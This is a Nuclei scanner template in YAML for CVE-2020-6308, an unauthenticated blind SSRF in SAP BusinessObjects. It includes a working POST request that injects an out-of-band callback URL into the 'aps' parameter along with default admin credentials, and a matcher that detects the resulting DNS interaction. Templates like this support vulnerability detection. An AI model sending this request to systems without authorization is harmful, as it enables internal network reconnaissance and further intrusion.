31 lines
1.3 KiB
YAML
31 lines
1.3 KiB
YAML
id: CVE-2020-6308
|
|
|
|
info:
|
|
name: Unauthenticated Blind SSRF in SAP
|
|
author: madrobot
|
|
severity: medium
|
|
description: SAP BusinessObjects Business Intelligence Platform (Web Services) versions - 410, 420, 430, allows an unauthenticated attacker to inject arbitrary values as CMS parameters to perform lookups on the
|
|
internal network which is otherwise not accessible externally. On successful exploitation, attacker can scan internal network to determine internal infrastructure and gather information for further attacks like
|
|
remote file inclusion, retrieve server files, bypass firewall and force the vulnerable server to perform malicious requests, resulting in a Server-Side Request Forgery vulnerability.
|
|
reference:
|
|
- https://github.com/InitRoot/CVE-2020-6308-PoC
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2020-6308
|
|
cwe-id: CWE-918
|
|
tags: cve,cve2020,sap,ssrf,oast,blind
|
|
|
|
requests:
|
|
- method: POST
|
|
path:
|
|
- '{{BaseURL}}/AdminTools/querybuilder/logon?framework='
|
|
|
|
body: aps={{interactsh-url}}&usr=admin&pwd=admin&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|